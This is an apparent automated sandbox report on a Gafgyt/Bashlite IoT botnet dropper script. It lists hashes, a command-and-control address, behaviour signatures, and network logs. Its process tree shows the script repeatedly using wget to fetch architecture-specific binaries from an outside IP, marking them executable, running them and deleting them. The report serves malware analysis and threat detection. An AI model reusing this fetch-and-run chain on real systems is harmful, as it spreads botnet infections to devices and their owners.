Analysis

  • max time kernel
    29s
  • max time network
    60s
  • platform
    ubuntu-20.04_amd64
  • resource
    ubuntu2004-amd64-20240508-en
  • resource tags

    arch:amd64, arch:i386, image:ubuntu2004-amd64-20240508-en, kernel:5.4.0-169-generic, locale:en-us, os:ubuntu-20.04-amd64, system
  • submitted
    28/09/2024, 07:55 UTC

General

  • Target

    sex.sh

  • Size

    1KB

  • MD5

    884dc57dd0892038d53a2d4b017504df

  • SHA1

    52ab9780591ee9718ce6188a9edafc1afa05dcdf

  • SHA256

    d347e32185478f56ce1c96e1e5dc3ad80ffdcf623036ca6750c60c6183a5c779

  • SHA512

    25e1afb67512005fecdf47712dfc1f0c74ecb221ed0f3904ff47f3ef30948334e31426003f6590c580024f758c7ab8576412a280b5f5ce3f787b6208037db3ca

Malware Config

Extracted

Family

gafgyt

C2

205.185.127.244:23

Signatures

  • Detected Gafgyt variant 11 IoCs
  • Gafgyt/Bashlite

    IoT botnet with numerous variants first seen in 2014.

  • File and Directory Permissions Modification 1 TTPs 13 IoCs

    Adversaries may modify file or directory permissions to evade defenses.

  • Executes dropped EXE 11 IoCs
  • Modifies Watchdog functionality 1 TTPs 6 IoCs

    Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.

  • Changes its process name 3 IoCs
  • System Network Configuration Discovery 1 TTPs 6 IoCs

    Adversaries may gather information about the network configuration of a system.

  • Writes file to tmp directory 11 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/sex.sh
    /tmp/sex.sh
    1⤵
      PID:1396
      • /usr/bin/wget
        wget http://205.185.127.244/mips
        2⤵
        • System Network Configuration Discovery
        • Writes file to tmp directory
        PID:1397
      • /usr/bin/chmod
        chmod +x mips
        2⤵
        • File and Directory Permissions Modification
        PID:1443
      • /tmp/mips
        ./mips
        2⤵
        • Executes dropped EXE
        • System Network Configuration Discovery
        PID:1444
      • /usr/bin/rm
        rm -rf mips
        2⤵
        • System Network Configuration Discovery
        PID:1446
      • /usr/bin/wget
        wget http://205.185.127.244/mipsel
        2⤵
        • System Network Configuration Discovery
        • Writes file to tmp directory
        PID:1447
      • /usr/bin/chmod
        chmod +x mipsel
        2⤵
        • File and Directory Permissions Modification
        PID:1448
      • /tmp/mipsel
        ./mipsel
        2⤵
        • Executes dropped EXE
        • System Network Configuration Discovery
        PID:1449
      • /usr/bin/rm
        rm -rf mipsel
        2⤵
        • System Network Configuration Discovery
        PID:1451
      • /usr/bin/wget
        wget http://205.185.127.244/sh4
        2⤵
        • Writes file to tmp directory
        PID:1452
      • /usr/bin/chmod
        chmod +x sh4
        2⤵
        • File and Directory Permissions Modification
        PID:1453
      • /tmp/sh4
        ./sh4
        2⤵
        • Executes dropped EXE
        PID:1454
      • /usr/bin/rm
        rm -rf sh4
        2⤵
        PID:1456
      • /usr/bin/wget
        wget http://205.185.127.244/x86
        2⤵
        • Writes file to tmp directory
        PID:1457
      • /usr/bin/chmod
        chmod +x x86
        2⤵
        • File and Directory Permissions Modification
        PID:1458
      • /tmp/x86
        ./x86
        2⤵
        • Executes dropped EXE
        • Modifies Watchdog functionality
        • Changes its process name
        PID:1459
      • /usr/bin/rm
        rm -rf x86
        2⤵
        PID:1462
      • /usr/bin/wget
        wget http://205.185.127.244/arm61
        2⤵
        • Writes file to tmp directory
        PID:1464
      • /usr/bin/chmod
        chmod +x arm61
        2⤵
        • File and Directory Permissions Modification
        PID:1466
      • /tmp/arm61
        ./arm61
        2⤵
        • Executes dropped EXE
        PID:1467
      • /usr/bin/rm
        rm -rf arm61
        2⤵
        PID:1469
      • /usr/bin/wget
        wget http://205.185.127.244/i686
        2⤵
        • Writes file to tmp directory
        PID:1470
      • /usr/bin/chmod
        chmod +x i686
        2⤵
        • File and Directory Permissions Modification
        PID:1471
      • /tmp/i686
        ./i686
        2⤵
        • Executes dropped EXE
        • Modifies Watchdog functionality
        • Changes its process name
        PID:1472
      • /usr/bin/rm
        rm -rf i686
        2⤵
        PID:1475
      • /usr/bin/wget
        wget http://205.185.127.244/ppc
        2⤵
        • Writes file to tmp directory
        PID:1477
      • /usr/bin/chmod
        chmod +x ppc
        2⤵
        • File and Directory Permissions Modification
        PID:1496
      • /tmp/ppc
        ./ppc
        2⤵
        • Executes dropped EXE
        PID:1497
      • /usr/bin/rm
        rm -rf ppc
        2⤵
        PID:1499
      • /usr/bin/wget
        wget http://205.185.127.244/586
        2⤵
        • Writes file to tmp directory
        PID:1500
      • /usr/bin/chmod
        chmod +x 586
        2⤵
        • File and Directory Permissions Modification
        PID:1501
      • /tmp/586
        ./586
        2⤵
        • Executes dropped EXE
        • Modifies Watchdog functionality
        • Changes its process name
        PID:1502
      • /usr/bin/rm
        rm -rf 586
        2⤵
        PID:1505
      • /usr/bin/wget
        wget http://205.185.127.244/m68k
        2⤵
        • Writes file to tmp directory
        PID:1507
      • /usr/bin/chmod
        chmod +x m68k
        2⤵
        • File and Directory Permissions Modification
        PID:1509
      • /tmp/m68k
        ./m68k
        2⤵
        • Executes dropped EXE
        PID:1510
      • /usr/bin/rm
        rm -rf m68k
        2⤵
        PID:1512
      • /usr/bin/wget
        wget http://205.185.127.244/dc
        2⤵
        PID:1513
      • /usr/bin/chmod
        chmod +x dc
        2⤵
        • File and Directory Permissions Modification
        PID:1514
      • /tmp/dc
        ./dc
        2⤵
        PID:1515
      • /usr/bin/rm
        rm -rf dc
        2⤵
        PID:1516
      • /usr/bin/wget
        wget http://205.185.127.244/dss
        2⤵
        • Writes file to tmp directory
        PID:1517
      • /usr/bin/chmod
        chmod +x dss
        2⤵
        • File and Directory Permissions Modification
        PID:1518
      • /tmp/dss
        ./dss
        2⤵
        • Executes dropped EXE
        PID:1519
      • /usr/bin/rm
        rm -rf dss
        2⤵
        PID:1521
      • /usr/bin/wget
        wget http://205.185.127.244/co
        2⤵
        • Writes file to tmp directory
        PID:1522
      • /usr/bin/chmod
        chmod +x co
        2⤵
        • File and Directory Permissions Modification
        PID:1523
      • /tmp/co
        ./co
        2⤵
        • Executes dropped EXE
        PID:1524
      • /usr/bin/rm
        rm -rf co
        2⤵
        PID:1526
      • /usr/bin/wget
        wget http://205.185.127.244/scar
        2⤵
        PID:1527
      • /usr/bin/chmod
        chmod +x scar
        2⤵
        • File and Directory Permissions Modification
        PID:1528
      • /tmp/scar
        ./scar
        2⤵
        PID:1529
      • /usr/bin/rm
        rm -rf scar
        2⤵
        PID:1530

Network

                                  • flag-us
                                    GET
                                    http://205.185.127.244/mips
                                    Remote address:
                                    205.185.127.244:80
                                    Request
                                    GET /mips HTTP/1.1
                                    User-Agent: Wget/1.20.3 (linux-gnu)
                                    Accept: */*
                                    Accept-Encoding: identity
                                    Host: 205.185.127.244
                                    Connection: Keep-Alive
                                    Response
                                    HTTP/1.1 200 OK
                                    Date: Sat, 28 Sep 2024 07:55:37 GMT
                                    Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.4.16
                                    Last-Modified: Mon, 09 Sep 2024 05:55:37 GMT
                                    ETag: "2c264-621a967fb0e2a"
                                    Accept-Ranges: bytes
                                    Content-Length: 180836
                                    Keep-Alive: timeout=5, max=100
                                    Connection: Keep-Alive
                                  • flag-us
                                    DNS
                                    connectivity-check.ubuntu.com
                                    Remote address:
                                    1.1.1.1:53
                                    Request
                                    connectivity-check.ubuntu.com
                                    IN AAAA
                                    Response
                                  • flag-us
                                    GET
                                    http://205.185.127.244/mipsel
                                    Remote address:
                                    205.185.127.244:80
                                    Request
                                    GET /mipsel HTTP/1.1
                                    User-Agent: Wget/1.20.3 (linux-gnu)
                                    Accept: */*
                                    Accept-Encoding: identity
                                    Host: 205.185.127.244
                                    Connection: Keep-Alive
                                    Response
                                    HTTP/1.1 200 OK
                                    Date: Sat, 28 Sep 2024 07:55:41 GMT
                                    Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.4.16
                                    Last-Modified: Mon, 09 Sep 2024 05:55:37 GMT
                                    ETag: "2c264-621a967fb21b2"
                                    Accept-Ranges: bytes
                                    Content-Length: 180836
                                    Keep-Alive: timeout=5, max=100
                                    Connection: Keep-Alive
                                  • flag-us
                                    GET
                                    http://205.185.127.244/sh4
                                    Remote address:
                                    205.185.127.244:80
                                    Request
                                    GET /sh4 HTTP/1.1
                                    User-Agent: Wget/1.20.3 (linux-gnu)
                                    Accept: */*
                                    Accept-Encoding: identity
                                    Host: 205.185.127.244
                                    Connection: Keep-Alive
                                    Response
                                    HTTP/1.1 200 OK
                                    Date: Sat, 28 Sep 2024 07:55:47 GMT
                                    Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.4.16
                                    Last-Modified: Mon, 09 Sep 2024 05:55:37 GMT
                                    ETag: "1eeb7-621a967fb44db"
                                    Accept-Ranges: bytes
                                    Content-Length: 126647
                                    Keep-Alive: timeout=5, max=100
                                    Connection: Keep-Alive
                                  • flag-us
                                    GET
                                    http://205.185.127.244/x86
                                    Remote address:
                                    205.185.127.244:80
                                    Request
                                    GET /x86 HTTP/1.1
                                    User-Agent: Wget/1.20.3 (linux-gnu)
                                    Accept: */*
                                    Accept-Encoding: identity
                                    Host: 205.185.127.244
                                    Connection: Keep-Alive
                                    Response
                                    HTTP/1.1 200 OK
                                    Date: Sat, 28 Sep 2024 07:55:58 GMT
                                    Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.4.16
                                    Last-Modified: Mon, 09 Sep 2024 05:55:37 GMT
                                    ETag: "1fe71-621a967fb641b"
                                    Accept-Ranges: bytes
                                    Content-Length: 130673
                                    Keep-Alive: timeout=5, max=100
                                    Connection: Keep-Alive
                                  • flag-us
                                    GET
                                    http://205.185.127.244/arm61
                                    Remote address:
                                    205.185.127.244:80
                                    Request
                                    GET /arm61 HTTP/1.1
                                    User-Agent: Wget/1.20.3 (linux-gnu)
                                    Accept: */*
                                    Accept-Encoding: identity
                                    Host: 205.185.127.244
                                    Connection: Keep-Alive
                                    Response
                                    HTTP/1.1 200 OK
                                    Date: Sat, 28 Sep 2024 07:56:01 GMT
                                    Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.4.16
                                    Last-Modified: Mon, 09 Sep 2024 05:55:37 GMT
                                    ETag: "2b951-621a967fb7f73"
                                    Accept-Ranges: bytes
                                    Content-Length: 178513
                                    Keep-Alive: timeout=5, max=100
                                    Connection: Keep-Alive
                                  • flag-us
                                    GET
                                    http://205.185.127.244/i686
                                    Remote address:
                                    205.185.127.244:80
                                    Request
                                    GET /i686 HTTP/1.1
                                    User-Agent: Wget/1.20.3 (linux-gnu)
                                    Accept: */*
                                    Accept-Encoding: identity
                                    Host: 205.185.127.244
                                    Connection: Keep-Alive
                                    Response
                                    HTTP/1.1 200 OK
                                    Date: Sat, 28 Sep 2024 07:56:03 GMT
                                    Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.4.16
                                    Last-Modified: Mon, 09 Sep 2024 05:55:37 GMT
                                    ETag: "1bc7f-621a967fb96e3"
                                    Accept-Ranges: bytes
                                    Content-Length: 113791
                                    Keep-Alive: timeout=5, max=100
                                    Connection: Keep-Alive
                                  • flag-us
                                    GET
                                    http://205.185.127.244/ppc
                                    Remote address:
                                    205.185.127.244:80
                                    Request
                                    GET /ppc HTTP/1.1
                                    User-Agent: Wget/1.20.3 (linux-gnu)
                                    Accept: */*
                                    Accept-Encoding: identity
                                    Host: 205.185.127.244
                                    Connection: Keep-Alive
                                    Response
                                    HTTP/1.1 200 OK
                                    Date: Sat, 28 Sep 2024 07:56:04 GMT
                                    Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.4.16
                                    Last-Modified: Mon, 09 Sep 2024 05:55:38 GMT
                                    ETag: "202e8-621a967fbae53"
                                    Accept-Ranges: bytes
                                    Content-Length: 131816
                                    Keep-Alive: timeout=5, max=100
                                    Connection: Keep-Alive
                                  • flag-us
                                    GET
                                    http://205.185.127.244/586
                                    Remote address:
                                    205.185.127.244:80
                                    Request
                                    GET /586 HTTP/1.1
                                    User-Agent: Wget/1.20.3 (linux-gnu)
                                    Accept: */*
                                    Accept-Encoding: identity
                                    Host: 205.185.127.244
                                    Connection: Keep-Alive
                                    Response
                                    HTTP/1.1 200 OK
                                    Date: Sat, 28 Sep 2024 07:56:06 GMT
                                    Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.4.16
                                    Last-Modified: Mon, 09 Sep 2024 05:55:38 GMT
                                    ETag: "1ac97-621a967fbc1db"
                                    Accept-Ranges: bytes
                                    Content-Length: 109719
                                    Keep-Alive: timeout=5, max=100
                                    Connection: Keep-Alive
                                  • flag-us
                                    GET
                                    http://205.185.127.244/m68k
                                    Remote address:
                                    205.185.127.244:80
                                    Request
                                    GET /m68k HTTP/1.1
                                    User-Agent: Wget/1.20.3 (linux-gnu)
                                    Accept: */*
                                    Accept-Encoding: identity
                                    Host: 205.185.127.244
                                    Connection: Keep-Alive
                                    Response
                                    HTTP/1.1 200 OK
                                    Date: Sat, 28 Sep 2024 07:56:07 GMT
                                    Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.4.16
                                    Last-Modified: Mon, 09 Sep 2024 05:55:38 GMT
                                    ETag: "205ff-621a967fbd94b"
                                    Accept-Ranges: bytes
                                    Content-Length: 132607
                                    Keep-Alive: timeout=5, max=100
                                    Connection: Keep-Alive
                                  • flag-us
                                    GET
                                    http://205.185.127.244/dc
                                    Remote address:
                                    205.185.127.244:80
                                    Request
                                    GET /dc HTTP/1.1
                                    User-Agent: Wget/1.20.3 (linux-gnu)
                                    Accept: */*
                                    Accept-Encoding: identity
                                    Host: 205.185.127.244
                                    Connection: Keep-Alive
                                    Response
                                    HTTP/1.1 404 Not Found
                                    Date: Sat, 28 Sep 2024 07:56:09 GMT
                                    Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.4.16
                                    Content-Length: 200
                                    Keep-Alive: timeout=5, max=100
                                    Connection: Keep-Alive
                                    Content-Type: text/html; charset=iso-8859-1
                                  • flag-us
                                    GET
                                    http://205.185.127.244/dss
                                    Remote address:
                                    205.185.127.244:80
                                    Request
                                    GET /dss HTTP/1.1
                                    User-Agent: Wget/1.20.3 (linux-gnu)
                                    Accept: */*
                                    Accept-Encoding: identity
                                    Host: 205.185.127.244
                                    Connection: Keep-Alive
                                    Response
                                    HTTP/1.1 200 OK
                                    Date: Sat, 28 Sep 2024 07:56:09 GMT
                                    Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.4.16
                                    Last-Modified: Mon, 09 Sep 2024 05:55:38 GMT
                                    ETag: "21e0b-621a967fc082c"
                                    Accept-Ranges: bytes
                                    Content-Length: 138763
                                    Keep-Alive: timeout=5, max=100
                                    Connection: Keep-Alive
                                  • flag-us
                                    GET
                                    http://205.185.127.244/co
                                    Remote address:
                                    205.185.127.244:80
                                    Request
                                    GET /co HTTP/1.1
                                    User-Agent: Wget/1.20.3 (linux-gnu)
                                    Accept: */*
                                    Accept-Encoding: identity
                                    Host: 205.185.127.244
                                    Connection: Keep-Alive
                                    Response
                                    HTTP/1.1 200 OK
                                    Date: Sat, 28 Sep 2024 07:56:11 GMT
                                    Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.4.16
                                    Last-Modified: Mon, 09 Sep 2024 05:55:38 GMT
                                    ETag: "2b951-621a967fc1f9c"
                                    Accept-Ranges: bytes
                                    Content-Length: 178513
                                    Keep-Alive: timeout=5, max=100
                                    Connection: Keep-Alive
                                  • flag-us
                                    GET
                                    http://205.185.127.244/scar
                                    Remote address:
                                    205.185.127.244:80
                                    Request
                                    GET /scar HTTP/1.1
                                    User-Agent: Wget/1.20.3 (linux-gnu)
                                    Accept: */*
                                    Accept-Encoding: identity
                                    Host: 205.185.127.244
                                    Connection: Keep-Alive
                                    Response
                                    HTTP/1.1 404 Not Found
                                    Date: Sat, 28 Sep 2024 07:56:13 GMT
                                    Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.4.16
                                    Content-Length: 202
                                    Keep-Alive: timeout=5, max=100
                                    Connection: Keep-Alive
                                    Content-Type: text/html; charset=iso-8859-1
                                  • 205.185.127.244:80
                                    http://205.185.127.244/mips
                                    http
                                    2.6kB
                                    188.3kB
                                    43
                                    138

                                    HTTP Request

                                    GET http://205.185.127.244/mips

                                    HTTP Response

                                    200
                                  • 205.185.127.244:80
                                    http://205.185.127.244/mipsel
                                    http
                                    4.6kB
                                    189.8kB
                                    84
                                    140

                                    HTTP Request

                                    GET http://205.185.127.244/mipsel

                                    HTTP Response

                                    200
                                  • 205.185.127.244:80
                                    http://205.185.127.244/sh4
                                    http
                                    3.3kB
                                    133.5kB
                                    51
                                    100

                                    HTTP Request

                                    GET http://205.185.127.244/sh4

                                    HTTP Response

                                    200
                                  • 205.185.127.244:80
                                    http://205.185.127.244/x86
                                    http
                                    2.6kB
                                    136.2kB
                                    47
                                    101

                                    HTTP Request

                                    GET http://205.185.127.244/x86

                                    HTTP Response

                                    200
                                  • 205.185.127.244:23
                                    363 B
                                    221 B
                                    5
                                    4
                                  • 205.185.127.244:80
                                    http://205.185.127.244/arm61
                                    http
                                    3.6kB
                                    185.9kB
                                    67
                                    136

                                    HTTP Request

                                    GET http://205.185.127.244/arm61

                                    HTTP Response

                                    200
                                  • 205.185.127.244:80
                                    http://205.185.127.244/i686
                                    http
                                    2.9kB
                                    118.7kB
                                    53
                                    88

                                    HTTP Request

                                    GET http://205.185.127.244/i686

                                    HTTP Response

                                    200
                                  • 205.185.127.244:23
                                    254 B
                                    112 B
                                    3
                                    2
                                  • 205.185.127.244:80
                                    http://205.185.127.244/ppc
                                    http
                                    3.3kB
                                    137.4kB
                                    61
                                    102

                                    HTTP Request

                                    GET http://205.185.127.244/ppc

                                    HTTP Response

                                    200
                                  • 205.185.127.244:80
                                    http://205.185.127.244/586
                                    http
                                    2.6kB
                                    114.4kB
                                    47
                                    85

                                    HTTP Request

                                    GET http://205.185.127.244/586

                                    HTTP Response

                                    200
                                  • 205.185.127.244:23
                                    254 B
                                    112 B
                                    3
                                    2
                                  • 205.185.127.244:80
                                    http://205.185.127.244/m68k
                                    http
                                    2.6kB
                                    138.2kB
                                    48
                                    102

                                    HTTP Request

                                    GET http://205.185.127.244/m68k

                                    HTTP Response

                                    200
                                  • 205.185.127.244:80
                                    http://205.185.127.244/dc
                                    http
                                    464 B
                                    663 B
                                    6
                                    4

                                    HTTP Request

                                    GET http://205.185.127.244/dc

                                    HTTP Response

                                    404
                                  • 205.185.127.244:80
                                    http://205.185.127.244/dss
                                    http
                                    3.3kB
                                    144.6kB
                                    60
                                    107

                                    HTTP Request

                                    GET http://205.185.127.244/dss

                                    HTTP Response

                                    200
                                  • 205.185.127.244:80
                                    http://205.185.127.244/co
                                    http
                                    3.5kB
                                    185.9kB
                                    64
                                    136

                                    HTTP Request

                                    GET http://205.185.127.244/co

                                    HTTP Response

                                    200
                                  • 205.185.127.244:80
                                    http://205.185.127.244/scar
                                    http
                                    466 B
                                    665 B
                                    6
                                    4

                                    HTTP Request

                                    GET http://205.185.127.244/scar

                                    HTTP Response

                                    404
                                  • 224.0.0.251:5353
                                    73 B
                                    1
                                  • 1.1.1.1:53
                                    connectivity-check.ubuntu.com
                                    dns
                                    86 B
                                    422 B
                                    1
                                    1

                                    DNS Request

                                    connectivity-check.ubuntu.com

                                    DNS Response

                                  MITRE ATT&CK Enterprise v15

                                  Downloads

                                  • /tmp/586

                                    Filesize

                                    107KB

                                  • /tmp/arm61

                                    Filesize

                                    174KB

                                  • /tmp/co

                                    Filesize

                                    174KB

                                  • /tmp/dss

                                    Filesize

                                    135KB

                                  • /tmp/i686

                                    Filesize

                                    111KB

                                  • /tmp/m68k

                                    Filesize

                                    129KB

                                  • /tmp/mips

                                    Filesize

                                    176KB

                                  • /tmp/mipsel

                                    Filesize

                                    176KB

                                  • /tmp/ppc

                                    Filesize

                                    128KB

                                  • /tmp/sh4

                                    Filesize

                                    123KB

                                  • /tmp/x86

                                    Filesize

                                    127KB
